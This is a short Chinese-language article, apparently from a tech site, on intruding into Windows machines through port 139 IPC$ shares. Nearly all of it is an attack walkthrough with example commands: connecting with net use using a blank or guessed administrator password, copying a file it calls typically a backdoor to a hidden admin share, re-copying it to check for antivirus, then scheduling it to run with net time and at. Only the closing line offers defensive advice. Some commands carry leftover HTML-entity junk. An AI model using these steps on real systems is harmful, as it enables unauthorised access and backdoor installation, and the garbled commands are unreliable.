淺談139端口入侵
139端口入侵是一個(gè)非常基礎(chǔ)的入侵方式了,很多企業(yè)安全管理員幾乎都已經(jīng)無(wú)視了這種入侵方法。但是所謂別在小河溝里翻了船,還是希望企業(yè)安全管理員能夠全面地注意安全防范,下面就介紹一下139端口入侵方式。
net use \\192.168.0.1\ipc$Content$nbsp;"" /user:administrator
首先,連接的命令是:
net<空格>use<空格>\\IP地址\ipc$Content$lt;空格>密碼<空格>/user:用戶名
假設(shè)我要連接的目標(biāo)IP地址是:192.168.1.11,用戶名是google,使用的密碼是123456,那么連接對(duì)方139端口通道的格式就是這樣的:
net use \\192.168.1.11\ipc$Content$nbsp;123456 /user:google 如果連接成功,那么系統(tǒng)會(huì)提示"命令成功完成"!
空密碼是這樣的:
如果密碼是空的,那就在原先輸入密碼的地方以""代替。
開始查看權(quán)限:
查看登錄后用戶權(quán)限的方法很簡(jiǎn)單,只要給目標(biāo)系統(tǒng)傳個(gè)文件就可以了,如果傳誦成功,那么一般都是系統(tǒng)管理員權(quán)限了,如果不成功可能就是來(lái)訪者權(quán)限或者其他用戶組的。命令的格式是這樣的:
copy<>文件絕對(duì)路徑<>\\IP地址\文件目標(biāo)路徑
比如我要將本地C盤下的a.exe文件拷貝到192.168.1.11的D盤下:
copy c:\a.exe \\192.168.1.11\d$Content$nbsp;
要注意"$"符,那是隱藏共享盤的表示符,如果對(duì)方的共享盤不是隱藏的,就不需要"$"符了。如果命令執(zhí)行成功,系統(tǒng)同樣會(huì)提示"已復(fù)制 1 個(gè)文件"
小技巧:
再次復(fù)制相同文件至相同路徑,以檢測(cè)是否存在殺毒軟件!?。?/p>
如果系統(tǒng)提示“改寫 \\192.168.1.11\d$\a.exe 嗎? (Yes/No/All):”則說(shuō)明文件在還在目標(biāo)系統(tǒng)上,沒有被殺毒軟件查殺(一般發(fā)送過去的都是后門程序只類的東西,只有系統(tǒng)安裝了殺毒軟件都會(huì)被殺掉)。如果沒有提示,則說(shuō)明安裝了殺毒軟件。
查看目標(biāo)系統(tǒng)時(shí)間,準(zhǔn)備使用at任務(wù)計(jì)劃運(yùn)行程序。
命令格式:
net<空格>time<空格>\\IP地址
例子:
net time \\192.168.1.11
系統(tǒng)會(huì)返回目標(biāo)的當(dāng)前時(shí)間,時(shí)間顯示后,AT任務(wù)計(jì)劃命令需要使用24小時(shí)制。比如系統(tǒng)顯示“\\192.168.1.11 的當(dāng)前時(shí)間是 2006/5/10 下午 06:02”在使用到AT任務(wù)計(jì)劃命令時(shí),這個(gè)“下午06:02”就需要換算成“18:02”!
使用AT命令為目標(biāo)系統(tǒng)添加任務(wù)計(jì)劃:
格式:
at<空格>\\IP地址<空格>指定運(yùn)行時(shí)間<空格>需要運(yùn)行的文件路徑名
例子:
at \\192.168.1.11 18:20 d:\a.exe
139端口入侵雖然基礎(chǔ),但是一旦中招也是有很大的危害,建議用戶將Server服務(wù)關(guān)閉,信使服務(wù)與Task Scheduler服務(wù)(計(jì)劃任務(wù))也都關(guān)閉,這樣可以較全面的保護(hù)計(jì)算機(jī)在IPC通道方面的安全。
【編輯推薦】